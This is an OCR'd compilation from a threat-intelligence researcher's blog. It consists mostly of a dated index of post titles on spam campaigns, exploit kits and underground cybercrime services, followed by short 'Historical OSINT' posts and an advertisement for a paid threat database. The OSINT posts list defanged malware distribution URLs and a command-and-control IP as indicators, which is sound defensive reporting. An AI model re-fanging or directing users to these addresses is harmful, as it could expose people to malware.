[154]Cybercriminals abuse major U.S SMS gateways, release DIY Mail-to-SMS flooders 
[155]‘PayPal Account Modified’ themed emails lead to Black Hole Exploit Kit 


[156]Bogus Better Business Bureau themed notifications serve client-side exploits and 
malware 


[157]Cybercriminals spamvertise bogus eFax Corporate delivery messages, serve multi- 
ple malware variants 


[158]Bogus IRS ‘Your tax return appeal is declined’ themed emails lead to malware 


[159]‘Copies of Missing EPLI Policies’ themed emails lead to Black Hole Exploit Kit 


¢ [160]Cybercriminals spamvertise bogus ‘Microsoft License Orders’ serve client-side ex- 
ploits and malware 


¢ [161]Cybercriminals resume spamvertising ‘Payroll Account Cancelled by Intuit’ themed 
emails, serve client-side exploits and malware 


¢ [162]Cybercriminals spamvertise millions of FDIC ‘Your activity is discontinued’ themed 
emails, serve client-side exploits and malware 


¢ [163]Cybercriminals release stealthy DIY mass iFrame injecting Apache 2 modules 


¢ [164]Multiple ‘Inter-company’ invoice themed campaigns serve malware and client-side 
exploits 


¢ [165]Bogus Facebook ‘pending notifications’ themed emails serve client-side exploits and 
malware 


¢ [166]Cybercriminals target U.K users with bogus ‘Pay by Phone Parking Receipts’ serve 
malware 


¢ [167]Bogus DHL ‘Express Delivery Notifications’ serve malware 

¢ [168]Cybercriminals impersonate Vodafone U.K, spread malicious MMS notifications 
¢ [169]Cybercriminals impersonate T-Mobile U.K, serve malware 

¢ [170]Bogus ‘Meeting Reminder” themed emails serve malware 

¢ [171]Bogus ‘Intuit Software Order Confirmations’ lead to Black Hole Exploit Kit 


¢ [172]Bogus ‘End of August Invoices’ themed emails serve malware and client-side exploits 


12. December - 2012 


¢ [173]DIY malicious domain name registering service spotted in the wild 
¢ [174]Fake ‘FedEx Tracking Number’ themed emails lead to malware 


¢ [175]Bogus ‘Facebook Account Cancellation Request’ themed emails serve client-side ex- 
ploits and malware 


¢ [176]Malicious ‘Security Update for Banking Accounts’ emails lead to Black Hole Exploit 
Kit 


¢ [177]A peek inside a boutique cybercrime-friendly E-shop - part five 

¢ [178]Fake ‘Flight Reservation Confirmations’ themed emails lead to Black Hole Exploit Kit 
¢ [179]Malicious ‘Sendspace File Delivery Notifications’ lead to Black Hole Exploit Kit 

¢ [180]Fake Chase ‘Merchant Billing Statement’ themed emails lead to malware 


¢ [181]Cybercriminals entice potential cybercriminals into purchasing bogus credit cards 
data 
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[182]Fake ‘Change Facebook Color Theme’ events lead to rogue Chrome extensions 
[183]Fake ‘Citi Account Alert’ themed emails lead to Black Hole Exploit Kit 
[184]Spamvertised ‘Work at Home” scams impersonating CNBC spotted in the wild 


[185]Pharmaceutical scammers spamvertise YouTube themed emails, entice users into 
purchasing counterfeit drugs 


[186]Cybercriminals resume spamvertising British Airways themed E-ticket receipts, 
serve malware 


[187]Fake ‘UPS Delivery Confirmation Failed’ themed emails lead to Black Hole Exploit Kit 


12. January - 2013 


5610 


[188]Spamvertised ‘Your Recent eBill from Verizon Wireless’ themed emails serve client- 
side exploits and malware 


[189]Fake BBB (Better Business Bureau) Notifications lead to Black Hole Exploit Kit 


[190]‘Attention! Changes in the bank reports!’ themed emails lead to Black Hole Exploit 
Kit 


[191]Fake ‘You have made an Ebay purchase’ themed emails lead to client-side exploits 
and malware 


[192]A peek inside a boutique cybercrime-friendly E-shop - part six 


[193]Black Hole Exploit Kit author’s ‘vertical market integration’ fuels growth in malicious 
Web activity 


[194]Spamvertised AICPA themed emails serve client-side exploits and malware 


[195]‘Please confirm your U.S Airways online registration’ themed emails lead to Black 
Hole Exploit Kit 


[196]Malicious DIY Java applet distribution platforms going mainstream 
[197]Fake ‘ADP Speedy Notifications’ lead to client-side exploits and malware 


[198]Cybercriminals release automatic CAPTCHA-solving bogus Youtube account generat- 
ing tool 


[199]‘Batch Payment File Declined’ EFTPS themed emails lead to Black Hole Exploit Kit 


[200]Cybercriminals resume spamvertising fake Vodafone ‘A new picture or video mes- 
sage’ themed emails, serve malware 


[201]Leaked DIY malware generating tool spotted in the wild 
[202]Email hacking for hire going mainstream - part three 


[203]Android malware spreads through compromised legitimate Web sites 


[204]Fake Intuit ‘Direct Deposit Service Informer’ themed emails lead to Black Hole Exploit 
Kit 


[205]Fake LinkedIn ‘Invitation Notifications’ themed emails lead to client-side exploits and 
malware 


[206]Novice cybercriminals experiment with DIY ransomware tools 


[207]Bogus ‘Your Paypal Transaction Confirmation’ themed emails lead to Black Hole Ex- 
ploit Kit 


[208]Fake ‘FedEx Online Billing - Invoice Prepared to be Paid’ themed emails lead to Black 
Hole Exploit Kit 


[209]A peek inside a DIY password stealing malware 


[210]Malicious ‘Facebook Account Cancellation Request” themed emails serve client-side 
exploits and malware 


12. February - 2013 


[211]Fake Booking.com ‘Credit Card was not Accepted’ themed emails lead to malware 


[212]Fake FedEx ‘Tracking ID/Tracking Number/Tracking Detail’ themed emails lead to mal- 
ware 


[213]‘Your Kindle e-book Amazon receipt’ themed emails lead to Black Hole Exploit Kit 
[214]New DIY HTTP-based botnet tool spotted in the wild 

[215]Mobile soammers release DIY phone number harvesting tool 

[216]New underground service offers access to thousands of malware-infected hosts 
[217]Targeted ‘phone ring flooding’ attacks as a service going mainstream 


[218]Fake ‘You've blocked/disabled your Facebook account’ themed emails serve client- 
side exploits and malware 


[219]Spamvertised IRS ‘Income Tax Refund Turned Down’ themed emails lead to Black 
Hole Exploit Kit 


[220]Malware propagates through localized Facebook Wall posts 


[221]Malicious ‘RE: Your Wire Transfer’ themed emails serve client-side exploits and mal- 
ware 


[222]New underground E-shop offers access to hundreds of hacked PayPal accounts 
[223]Fake ‘Verizon Wireless Statement” themed emails lead to Black Hole Exploit Kit 


[224]DIY malware cryptor as a Web service spotted in the wild 
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[225]Malicious ‘Data Processing Service’ ACH File ID themed emails serve client-side ex- 
ploits and malware 


[226]How mobile spammers verify the validity of harvested phone numbers 


[227]How much does it cost to buy 10,000 U.S.-based malware-infected hosts? 


13. March - 2013 
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[228]New DIY IRC-based DDoS bot spotted in the wild 
[229]Cybercriminals release new Java exploits centered exploit kit 
[230]Segmented Russian “spam leads” offered for sale 


[231]New DIY hacked email account content grabbing tool facilitates cyber espionage on 
a mass scale 


[232]New DIY unsigned malicious Java applet generating tool spotted in the wild 


[233]Commercial Steam ‘information harvester/mass group inviter’ could lead to targeted 
fraudulent campaigns 


[234]Fake BofA CashPro ‘Online Digital Certificate” themed emails lead to malware 


[235]Spamvertised BBB ‘Your Accreditation Terminated” themed emails lead to Black Hole 
Exploit Kit 


[236]New ZeuS source code based rootkit available for purchase on the underground mar- 
ket 


[237]Cybercriminals resume spamvertising ‘Re: Fwd: Wire Transfer’ themed emails, serve 
client-side exploits and malware 


[238]‘ADP Package Delivery Notification’ themed emails lead to Black Hole Exploit Kit 


[239]Cybercrime-friendly community branded HTTP/SMTP based keylogger spotted in the 
wild 


[240]Hacked PCs as ‘anonymization stepping-stones’ service operates in the open since 
2004 


[241]Fake ‘CNN Breaking News Alerts’ themed emails lead to Black Hole Exploit Kit 


[242]Spotted: cybercriminals working on new Western Union based ‘money mule man- 
agement’ script 


[243]Malicious ‘BBC Daily Email’ Cyprus bailout themed emails lead to Black Hole Exploit 
Kit 


[244]‘ADP Payroll Invoice’ themed emails lead to malware 


[245]‘Terminated Wire Transfer Notification/ACH File ID” themed malicious campaigns lead 
to Black Hole Exploit Kit 


[246]New DIY RDP-based botnet generating tool leaks in the wild 


[247]A peek inside the EgyPack Web malware exploitation kit 


14. April - 2013 


[248]DIY Java-based RAT (Remote Access Tool) spotted in the wild 
[249]Spamvertised ‘Re: Changelog as promised’ themed emails lead to malware 


[250]Cybercrime-friendly service offers access to tens of thousands of compromised ac- 
counts 


[251]Madi/Mahdi/Flashback OS X connected malware spreading through Skype 


[252]Cybercriminals selling valid ‘ousiness card’ data of company executives across mul- 
tiple verticals 


[253]A peek inside the ‘Zerokit/Okit/ringO bundle’ bootkit 
[254]DIY Skype ring flooder offered for sale 


[255]Spamvertised ‘Your order for helicopter for the weekend’ themed emails lead to mal- 
ware 


[256]A peek inside a ‘life cycle aware’ underground market ad for a private keylogger 
[257]American Airlines ‘You can download your ticket’ themed emails lead to malware 
[258]Cybercriminals offer soam-friendly SMTP servers for rent [259] 

[260]How mobile spammers verify the validity of harvested phone numbers - part two 
[261]A peek inside a (cracked) commercially available RAT (Remote Access Tool) 
[262]DIY Russian mobile number harvesting tool spotted in the wild 

[263]DIY SIP-based TDoS tool/number validity checker offered for sale 
[264]CAPTCHA-solving Russian email account registration tool helps facilitate cybercrime 


[265]Historical OSINT - The ‘Boston Marathon explosion’ and ‘Fertilizer plant explosion in 
Texas’ themed malware campaigns 


[266]Fake ‘DHL Delivery Report’ themed emails lead to malware 
[267]Cybercriminals impersonate Bank of America (BofA), serve malware 


[268]How fraudulent blackhat SEO monetizers apply Quality Assurance (QA) to their DIY 
doorway generators 


[269]Managed ‘Russian ransomware’ as a service spotted in the wild 
5613 


15. May - 2013 


[270]FedWire ‘Your Wire Transfer’ themed emails lead to malware 
[271]A peek inside a CVE-2013-0422 exploiting DIY malicious Java applet generating tool 
[272]New IRC/HTTP based DDoS bot wipes out competing malware 


[273]New version of DIY Google Dorks based mass website hacking tool spotted in the 
wild 


[274]Citibank ‘Merchant Billing Statement’ themed emails lead to malware 


[275]Fake Amazon ‘Your Kindle E-Book Order’ themed emails circulating in the wild, lead 
to client-side exploits and malware 


[276]Cybercriminals impersonate New York State’s Department of Motor Vehicles (DMV), 
serve malware 


[277]Cybercriminals offer HTTP-based keylogger for sale, accept Bitcoin 

[278]Newly launched E-shop for hacked PCs charges based on malware ‘executions’ 
[279]New subscription-based ‘stealth Bitcoin miner’ spotted in the wild 

[280]Fake ‘Free Media Player’ distributed via rogue ‘Adobe Flash Player HD’ advertisement 
[281]New versatile and remote-controlled “Android.MouaBot” malware found in the wild 


[282]Newly launched ‘Magic Malware’ spam campaign relies on bogus ‘New MMS’ mes- 
sages 


[283]Commercial ‘form grabbing’ rootkit spotted in the wild 

[284]DIY malware cryptor as a Web service spotted in the wild - part two 
[285]CVs and sensitive info soliciting email campaign impersonates NATO 
[286]New commercially available DIY invisible Bitcoin miner spotted in the wild 
[287 ]Fake ‘Export License/Payment Invoice’ themed emails lead to malware 
[288]Compromised Indian government Web site leads to Black Hole Exploit Kit 


[289]Cybercriminals resume spamvertising Citibank ‘Merchant Billing Statement’ themed 
emails, serve malware 


[290]Marijuana-themed DDoS for hire service spotted in the wild 


[291]Fake ‘Vodafone U.K Images’ themed malware serving spam campaign circulating in 
the wild 


16. June - 2013 
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¢ [292]Compromised FTP/SSH account privilege-escalating mass iFrame embedding plat- 
form released on the underground marketplace 


¢ [293]New E-shop sells access to thousands of hacked PCs, accepts Bitcoin 


¢ [294]Pharmaceutical scammers impersonate Facebook’s Notification System, entice users 
into purchasing counterfeit drugs 


[295]iLivid ads lead to ‘Searchqu Toolbar/Search Suite’ PUA (Potentially Unwanted Appli- 
cation) 


¢ [296]Hacked Origin, Uplay, Hulu Plus, Netflix, Spotify, Skype, Twitter, Instagram, Tumblr, 
Freelancer accounts offered for sale 


¢ [297]Scammers impersonate the UN Refugee Agency (UNHCR), seek your credit card de- 
tails 


¢ [298]Fake ‘Unsuccessful Fax Transmission’ themed emails lead to malware 
¢ [299]Tens of thousands of spamvertised emails lead to W32/Casonline 
¢ [300]Rogue ads lead to SafeMonitorApp Potentially Unwanted Application (PUA) 


¢ [301]How cybercriminals apply Quality Assurance (QA) to their malware campaigns before 
launching them 


¢ [302]Rogue ads target EU users, expose them to Win32/Toolbar.SearchSuite through the 
KingTranslate PUA 


¢ [303]New boutique iFrame crypting service spotted in the wild 


¢ [304]Rogue ‘Oops Video Player’ attempts to visually social engineer users, mimicks Adobe 
Flash Player’s installation process 


¢ [305]New E-Shop sells access to thousands of malware-infected hosts, accepts Bitcoin 


¢ [306]New subscription-based SHA256/Scrypt supporting stealth DIY Bitcoin mining tool 
spotted in the wild 


¢ [307]Rogue ‘Free Mozilla Firefox Download’ ads lead to ‘InstallCore’ Potentially Unwanted 
Application (PUA) 


[308]SIP-based APlI-supporting fake caller ID/SMS number supporting DIY Russian service 
spotted in the wild 


¢ [309]Rogue ‘Free Codec Pack’ ads lead to Win32/InstallCore Potentially Unwanted Appli- 
cation (PUA) 


[310]Self-propagating ZeuS-based source code/binaries offered for sale 


¢ [311]How cybercriminals create and operate Android-based botnets 


17. July - 2013 
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[312]Cybercriminals experiment with Tor-based C &C, ring-3-rootkit empowered, SPDY 
form grabbing malware bot 


[313]Deceptive ads targeting German users lead to the ‘W32/SomotoBetterlInstaller’ Po- 
tentially Unwanted Application (PUA) 


[314]Newly launched underground market service harvests mobile phone numbers on 
demand 


[315]Novel ransomware tactic locks users’ PCs, demands that they participate in a survey 
to get the unlock code 


[316]Spamvertised ‘Export License/Invoice Copy’ themed emails lead to malware 


[317]Cybercriminals spamvertise tens of thousands of fake ‘Your Booking Reservation at 
Westminster Hotel’ themed emails, serve malware 


[318]New commercially available mass FTP-based proxy-supporting doorway/malicious 
script uploading application spotted in the wild 


[319]Fake ‘iGO4 Private Car Insurance Policy Amendment Certificate’ themed emails lead 
to malware 


[320]Tens of thousands of spamvertised emails lead to the Win32/PrimeCasino PUA (Po- 
tentially Unwanted Application) 


[321]Spamvertised ‘Vodafone U.K MMS ID/Fake Sage 50 Payroll’ themed emails lead to 
(identical) malware 


[322]New commercially available Web-based WordPress/Joomla brute-forcing tool spotted 
in the wild 


[323]Rogue ads targeting German users lead to Win32/InstallBrain PUA (Potentially Un- 
wanted Application) 


[324]Yet another commercially available stealth Bitcoin/Litecoin mining tool spotted in the 
wild 


[325]Protected: Deceptive ‘Media Player Update’ ads expose users to the rogue ‘Video 
Downloader/Bundlore’ Potentially Unwanted Application (PUA) 


[326]Newly launched ‘HTTP-based botnet setup as a service’ empowers novice cybercrim- 
inals with bulletproof hosting capabilities 


[327]Fake ‘Copy of Vodafone U.K Contract/Your Monthly Vodafone Bill is Ready/New MMS 
Received’ themed emails lead to malware 


[328]Rogue ads lead to the ‘Free Player’ Win32/Somoto Potentially Unwanted Application 
(PUA) 


[329]How much does it cost to buy one thousand Russian/Eastern European based 
malware-infected hosts? 


[330]Custom USB sticks bypassing Windows 7/8’s AutoRun protection measure going 
mainstream 


¢ [331]DIY commercially-available ‘automatic Web site hacking as a service’ spotted in the 
wild 


18. August - 2013 


¢ [332]‘Malware-infected hosts as stepping stones’ service offers access to hundreds of 
compromised U.S based hosts 


¢ [333]New ‘Hacked shells as a service’ empowers cybercriminals with access to high page 
rank-ed Web sites 


¢ [334]Fake ‘iPhone Picture Snapshot Message’ themed emails lead to malware 


¢ [335]Malicious Bank of America (BofA) ‘Statement of Expenses’ themed emails lead to 
client-side exploits and malware 


¢ [336]Cybercriminals spamvertise fake ‘O2 U.K MMS’ themed emails, serve malware 


¢ [337]One-stop-shop for spammers offers DKIM-verified SMTP servers, harvested email 
databases and training to potential customers 


¢ [338]Fake ‘Apple Store Gift Card’ themed emails serve client-side exploits and malware 
¢ [339]Newly launched managed ‘malware dropping’ service spotted in the wild 


¢ [340]Cybercrime-friendly underground traffic exchange helps facilitate fraudulent and ma- 
licious activity 


¢ [341]From Vietnam with tens of millions of harvested emails, spam-ready SMTP servers 
and DIY spamming tools 


¢ [342]DIY Craigslist email collecting tools empower spammers with access to fresh/valid 
email addresses 


¢ [343]Bulletproof TDS/Doorways/Pharma/Spam/Warez hosting service operates in the open 
since 2009 


¢ [344]DIY automatic cybercrime-friendly ‘redirectors generating’ service spotted in the 
wild 


¢ [345]Cybercriminals offer soam-ready SMTP servers for rent/direct managed purchase 


¢ [346]Cybercrime-friendly underground traffic exchanges help facilitate fraudulent and ma- 
licious activity - part two 


19. September - 2013 


¢ [347]DIY malicious Android APK generating ‘sensitive information stealer’ spotted in the 
wild 
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[348]Web-based DNS amplification DDoS attack mode supporting PHP script spotted in 
the wild 


[349]Managed Malicious Java Applets Hosting Service Spotted in the Wild 


[350]Affiliate network for mobile malware impersonates Google Play, tricks users into 
installing premium-rate SMS sending rogue apps 


[351]419 advance fee fraudsters abuse CNN’s ‘Email This’ Feature, spread Syrian Crisis 
themed scams 


[352]Cybercriminals offer anonymous mobile numbers for ‘SMS activation’, video tape 
the destruction of the SIM card on request 


[353]Yet another ‘malware-infected hosts as anonymization stepping stones’ service of- 
fering access to hundreds of compromised hosts spotted in the wild 


[354]Cybercriminals experiment with ‘Socks4/Socks5/HTTP’ malware-infected hosts 
based DIY DoS tool 


[355]Cybercriminals sell access to tens of thousands of malware-infected Russian hosts 


[356]Spamvertised “FDIC: Your business account” themed emails serve client-side ex- 
ploits and malware 


[357]Cybercriminals experiment with Android compatible, Python-based SQL injecting re- 
leases 


[358]Newly launched E-shop offers access to hundreds of thousands of compromised ac- 
counts 


[359]DIY commercial CAPTCHA-solving automatic email account registration tool available 
on the underground market since 2008 


[360]Yet another subscription-based stealth Bitcoin mining tool spotted in the wild 


20. October - 2013 
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[361]A peek inside a Blackhat SEO/cybercrime-friendly doorways management platform 


[362]Newly launched ‘HTTP-based botnet setup as a service’ empowers novice cybercrim- 
inals with bulletproof hosting capabilities - part two [363] 


[364]‘T-Mobile MMS message has arrived’ themed emails lead to malware 
[365]DDoS for hire vendor ‘vertically integrates’ starts offering TDoS attack capabilities 


[366]Commercially available Blackhat SEO enabled multi-third-party product licenses em- 
powered VPSs spotted in the wild 


[367]New cybercrime-friendly iFrames-based E-shop for traffic spotted in the wild 


[368]Cybercriminals offer soam-friendly SMTP servers for rent - part two 


¢ [369]Newly launched VDS-based cybercrime-friendly hosting provider helps facilitate 
fraudulent/malicious online activity 


¢ [370]Fake ‘You have missed emails’ GMail themed emails lead to pharmaceutical scams 
¢ [371]Compromised Turkish Government Web site leads to malware 

¢ [372]Novice cyberciminals offer commercial access to five mini botnets 

¢ [373]Spamvertised T-Mobile ‘Picture ID Type:MMS” themed emails lead to malware 


¢ [374]Yet another Bitcoin accepting E-shop offering access to thousands of hacked PCs 
spotted in the wild 


¢ [375]Malicious ‘FW: File’ themed emails lead to malware 
¢ [376]Mass iframe injection campaign leads to Adobe Flash exploits 


¢ [377]Rogue ads lead to the ‘Mipony Download Accelerator/FunMoods Toolbar’ PUA (Poten- 
tially Unwanted Application) 


¢ [378]A peek inside the administration panel of a standardized E-shop for compromised 
accounts 


¢ [379]U.K users targeted with fake ‘Confirming your Sky offer’ malware serving emails 
¢ [380]New DIY compromised hosts/proxies syndicating tool spotted in the wild 

¢ [381]Rogue ads lead to the ‘EzDownloaderpro’ PUA (Potentially Unwanted Application) 
¢ [382]Fake ‘Scanned Image from a Xerox WorkCentre’ themed emails lead to malware 
¢ [383]Fake ‘Important: Company Reports’ themed emails lead to malware 


¢ [384]Cybercriminals release new commercially available Android/BlackBerry supporting 
mobile malware bot 


¢ [385]Fake WhatsApp ‘Voice Message Notification/1 New Voicemail’ themed emails lead to 
malware 


21. November - 2013 


¢ [386]Google-dorks based mass Web site hacking/SQL injecting tool helps facilitate mali- 
cious online activity 


¢ [387]Deceptive ads lead to the SpyAlertApp PUA (Potentially Unwanted Application) 


¢ [388]Cybercriminals differentiate their ‘access to compromised PCs’ service proposition, 
emphasize on the prevalence of ‘female bot slaves’ 


¢ [389]New vendor of ‘professional DDoS for hire service’ spotted in the wild 


¢ [390]Source code for proprietary spam bot offered for sale, acts as force multiplier for 
cybercrime-friendly activity 
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[391]Low Quality Assurance (QA) iframe campaign linked to May’s Indian government 
Web site compromise spotted in the wild 


[392]Popular French torrent portal tricks users into installing the Bubble- 
Dock/Downware/DownloadWare PUA (Potentially Unwanted Application) 


[393]Web site of Brazilian ‘Prefeitura Municipal de Jaqueira’ compromised, leads to fake 
Adobe Flash player 


[394]Malicious multi-hop iframe campaign affects thousands of Web sites, leads to a cock- 
tail of client-side exploits 


[395]Vendor of TDoS products/services releases new multi-threaded SIP-based TDoS tool 


[396]Cybercriminals spamvertise tens of thousands of fake ‘Sent from my iPhone’ themed 
emails, expose users to malware 


[397 ]Fake ‘Annual Form (STD-261) - Authorization to Use Privately Owned Vehicle on State 
Business’ themed emails lead to malware 


[398]‘Newly released proxy-supporting Origin brute-forcing tools targets users with weak 
passwords’ 


[399]Fake WhatsApp ‘Voice Message Notification’ themed emails expose users to malware 


[400]Cybercriminals impersonate HSBC through fake ‘payment e-Advice’ themed emails, 
expose users to malware 


[401]Fake ‘MMS Gallery’ notifications impersonate T-Mobile U.K, expose users to malware 


[402]Fake ‘October’s Billing Address Code’ (BAC) form themed spam campaign leads to 
malware 


21. December - 2013 


[403]Cybercrime-friendly VPN service provider pitches itself as being ‘recommended by 
Edward Snowden’ 


[404]Commercial Windows-based compromised Web shells management application spot- 
ted in the wild 


[405]Compromised legitimate Web sites expose users to malicious Java/Symbian/Android 
“Browser Updates” 


[406]Malicious multi-hop iframe campaign affects thousands of Web sites, leads to a cock- 
tail of client-side exploits - part two 


[407]How cybercriminals efficiently violate YouTube, Facebook, Twitter, Instagram, Sound- 
Cloud and Google+’s ToS 


[408]TumblIr under fire from DIY CAPTCHA-solving, proxies-supporting automatic account 
registration tools 
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[409]Newly launched ‘HTTP-based botnet setup as a service’ empowers novice cybercrim- 
inals with bulletproof hosting capabilities - part three 


[410]Cybercriminals offer fellow cybercriminals training in Operational Security (OPSEC) 
[411]Fake ‘WhatsApp Missed Voicemail’ themed emails lead to pharmaceutical scams 


[412]A peek inside the booming underground market for stealth Bitcoin/Litecoin mining 
tools 


[413]Cybercrime Trends 2013 - Year in Review 


22. January - 2014 


[414]‘Adobe License Service Center Order NR’ and ‘Notice to appear in court’ themed 
malicious spam campaigns intercepted in the wild 


[415]Vendor of TDoS products resets market life cycle of well known 3G USB mo- 
dem/GSM/SIM card-based TDoS tool 


[416]New TDoS market segment entrant introduces 96 SIM cards compatible custom GSM 
module, positions itself as market disruptor 


[417]DIY Python-based mass insecure WordPress scanning/exploting tool with hundreds 
of pre-defined exploits spotted in the wild 


[418]Google’s reCAPTCHA under automatic fire from a newly launched reCAPTCHA- 
solving/breaking service 


[419]Fully automated, APl-supporting service, undermines Facebook and Google’s 
‘SMS/Mobile number activation’ account registration process 


[420]Newly launched managed ‘compromised/hacked accounts E-shop hosting as service’ 
standardizes the monetization process 


[421]Newly released Web based DDoS/Passwords stealing-capable DIY botnet generating 
tool spotted in the wild 


[422]Cybercriminals release new Web based keylogging system, rely on penetration pric- 
ing to gain market share 


23. February - 2014 


[423]Cybercriminals release Socks4/Socks5 based Alexa PageRank boosting application 


[424]Market leading ‘standardized cybercrime-friendly E-shop’ service brings 2500+ bou- 
tique E-shops online 
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[425]Managed TeamViewer based anti-forensics capable virtual machines offered as a 
service 


[426]Malicious campaign relies on rogue WordPress sites, leads to client-side exploits 
through the Magnitude exploit kit 


[427]‘Hacking for hire’ teams occupy multiple underground market segments, monetize 
their malicious ‘know how’ 


[428]DoubleClick malvertising campaign exposes long-run beneath the radar malvertising 
infrastructure 


[429]Spamvertised ‘Image has been sent’ Evernote themed campaign serves client-side 
exploits 


[430]Spamvertised ‘You received a new message from Skype voicemail service’ themed 
emails lead to Angler exploit kit 


24. March - 2014 
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[431]Deceptive ads expose users to PUA.InstallBrain/PC Performer PUA (Potentially Un- 
wanted Application) 


[432]Managed Web-based 300 GB/s capable DNS amplification enabled malware bot spot- 
ted in the wild 


[433]Commercial Windows-based compromised Web shells management application spot- 
ted in the wild - part two 


[434]Multiple spamvertised bogus online casino themed campaigns intercepted in the 
wild 


[435]5M+ harvested Russian mobile numbers service exposes fraudulent infrastructure 


[436]Socks4/Socks5 enabled hosts as a service introduces affiliate network based revenue 
sharing scheme 


[437]A peek inside a modular, Tor C &C enabled, Bitcoin mining malware bot 


[438]Managed anti-forensics IMEI modification services fuel growth in the non-attributable 
TDoS market segment 


[439]Commercially available database of 52M+ ccTLD zone transfer domains spotted in 
the wild 


[440]Deceptive ads expose users to the Adware. Linkular/Win32.SpeedUpMyPC.A PUAs (Po- 
tentially Unwanted Applications) 


[441]DIY automatic cybercrime-friendly ‘redirector generating’ service spotted in the wild 
- part two 


[442]Managed DDoS WordPress-targeting, XML-RPC API abusing service, spotted in the 
wild 


24. May - 2014 


¢ [443]Legitimate software apps impersonated in a blackhat SEO-friendly PUA (Potentially 
Unwanted Application) serving campaign 


¢ [444]DlY cybercrime-friendly (legitimate) APK injecting/decompiling app spotted in the 
wild 


¢ [445]Malicious DIY Java applet distribution platforms going mainstream - part two 
¢ [446]Spamvertised ‘Error in calculation of your tax’ themed emails lead to malware 


¢ [447]A peek inside a subscription-based DIY keylogging based type of botnet/malware 
generating tool 


¢ [448]Spamvertised ‘Notification of payment received’ themed emails lead to malware 


¢ [449]Malicious JJ Black Consultancy ‘Computer Support Services’ themed emails lead to 
malware 


¢ [450]A peek inside a newly launched all-in-one E-shop for cybercrime-friendly services 


¢ [451]Long run compromised accounting data based type of managed iframe-ing service 
spotted in the wild 


Enjoy! 
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14.3.3 Historical OSINT - Newly Launched Koobface Themed Campaign Spotted in 
the Wild (2018-07-30 11:37) 


Related malicious URLs known to have participated in the campaign: 


hxxp://qjcleaner.eu/hitin.php?affid=02979 


Once executed a sample malware phones back to a well known command and control 
server IPs: 


hxxp://212.117.160.18 GET /install.php?id=02979 


Parked at the same IP where crusade affiliates are were more scareware domains. Mean- 
while, the Koobface gang is currently busy typosquatting my name for registering domains 
(Rancho Ranchev; Pancho Panchev) for instance hxxp://mayernews.com - Email: lan- 
druh.al@gmail.com is registered using Danchev Danch. 
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14.4 August 


14.4.1 Historical OSINT - Turkey’s Chamber of Commerce Serving Malware 
(2018-08-02 22:36) 


oi06.cn 


elfah.net/h.js 


14.4.2 Dancho Danchev’s 2010 Disappearance - An Elaboration - Part Two 
(2018-08-12 00:44) 


14.5 September 


14.5.1 Introducing Threat Data - The World’s Most Comprehensive Threats Database 
(2018-09-20 16:30) 
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PRESENTED BY DANCHO DANCHEV 


CYBER 
THREATS 
EXPOSED 


THE WORLD'S LEADING EXPERT IN 
CYBERCRIME AND CYBER SECURITY PRESENTS 
THE WORLD'S MOST COMPREHENSIVE CYBER 

THREATS DATABASE 


Russian Businness Network Coverage - Koobface 
Botnet Coverage - Kneber Botnet Coverage - 
Hundreds of !1O0Cs (Indicators of Compromise) - 
Tactics Techniques and Procedures - In-Depth 
Coverage - Malicious and Fraudulent infrastructure 
Mapped and Exposed - Malicious and Fraudulent 
Blackahat SEO Coverage - Malicious Spam and 
Phishing Campaigns Coverage - Malicious and 
Fraudulent Scareware Campaigns Coverage 


PURCHASE INQUIRIES | 
DDANCHEV@PROTONMAIL.CH 


Dear blog readers, | wanted to take the time and effort and introduce you to Threat Data - 
the World’s Most Comprehensive Threats Database, a proprietary invite-only MISP-based data 
information and knowledge sharing community managed and operated by me which basically 
represents the vast majority of proprietary threat intelligence research that | produce on a 
daily basis these days. 


Users and organizations familiar with my research may be definitely interested in con- 
sidering the opportunity to obtain access to Threat Data including a possible sample including 
a possible trial of the service. 
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Find below a sample FAQ about Threat Data and consider obtaining access to ensure 
that you and your organization remains on the top of its game including ahead of current and 
emerging threats. 


01. How to request access including a possible trial including API access? 


Approach me at ddanchev@cryptogroup.net 


02. How do obtain automated access? 


The database is delivered daily/weekly/quarterly in MISP-friendly JSON-capable format in- 
cluding STIX coverage. 


03. How to request a sample? 


Users interested in requesting a sample can approach me at dancho.danchev@hush.com and 
I'd be more than happy to offer a recent threat intelligence research snapshot. 


04. Tell me more about the pricing options? 
Monthly subscriptions covering daily weekly and monthly updates start at $4,000 includ- 
ing guaranteed access to 24-32 analysis on a daily basis including active in-house all-source 


analysis guaranteeing that your organization remains on the top of its game by possessing the 
necessary data information and knowledge to stay ahead of current and emerging threats. 


05. What does the database cover? 

- Russian Business Network coverage 

- Koobface Botnet coverage 

- Kneber Botnet coverage 

- Hundreds of IOCs (Indicators of Compromise) 

- Tactics Techniques and Procedures In-Depth Coverage 


- Malicious and fraudulent infrastructure mapped and exposed 
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- Malicious and fraudulent Blackhat SEO coverage 

- Malicious spam and phishing campaigns 

- Malicious and fraudulent scareware campaigns 

- Malicious and fraudulent money mule recruitment scams 

- Malicious and fraudulent reshipping mule recruitment scams 

- Web based mass attack compromise fraudulent and malicious campaigns 


- Malicious and fraudulent client-side exploits serving campaigns 


The database also offers active malverising, scareware, rogueware, malware, phishing, 
spam, IM malware, mobile malware, mac OS X malware, android malware, blackhat SEO, 
money mule recruitment, reshipping mule recruitment, including ransomware coverage. 


06. How often does it update? 


Updates as issued on a daily weekly monthly basis guaranteeing unlimited access to in- 
house analysis all-source analysis guaranteeing access to daily weekly and monthly updates. 


Enjoy! 


14.6 October 


14.6.1 Historical OSINT - iPowerWeb Hacked Hundreds of Web Sites Affected 
(2018-10-19 18:17) 


In 2008 it became evident that a widespread malware-embedded attack took place success- 
fully affecting hundreds of iPowerWeb customers potentially exposing hundreds of legitimate 
Web sites to a multi-tude of malicious software courtesy of a well known [1]Russian Business 
Network’s hosting provider - HostFresh. 


In this post we’ll profile the campaign provide actionable intelligence on the infrastructure 
behind it and discuss in-depth the tactics techniques and procedures of the cybercriminals 
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behind it. We'll also establish a direct connection between the campaign’s infrastructure and 
the [2]Russian Business Network. 


Malicious URL: hxxp://58.65.232.33/gpack/index.php 


Related malicious URIs known’ to have participated in the campaign’ - 
hxxp://58.65.232.25/counter/getexe.php?h=11 hxxp://58.65.232.25/counter/getfile.php?- 
f=pdf 


We'll continue monitoring the campaign and post updates as soon as new developments 
take place. 


1. https://ddanchev.blogspot.com/2013/08/dissecting-sample-russian-business.htm 


2. https: //ddanchev.blogspot .com/2017/05/historical-osint-inside-2007-2009.htm 


14.6.2 Historical OSINT - Gumblar Botnet Infects Thousands of Sites Serves Adobe 
Flash Exploits (2018-10-19 22:46) 


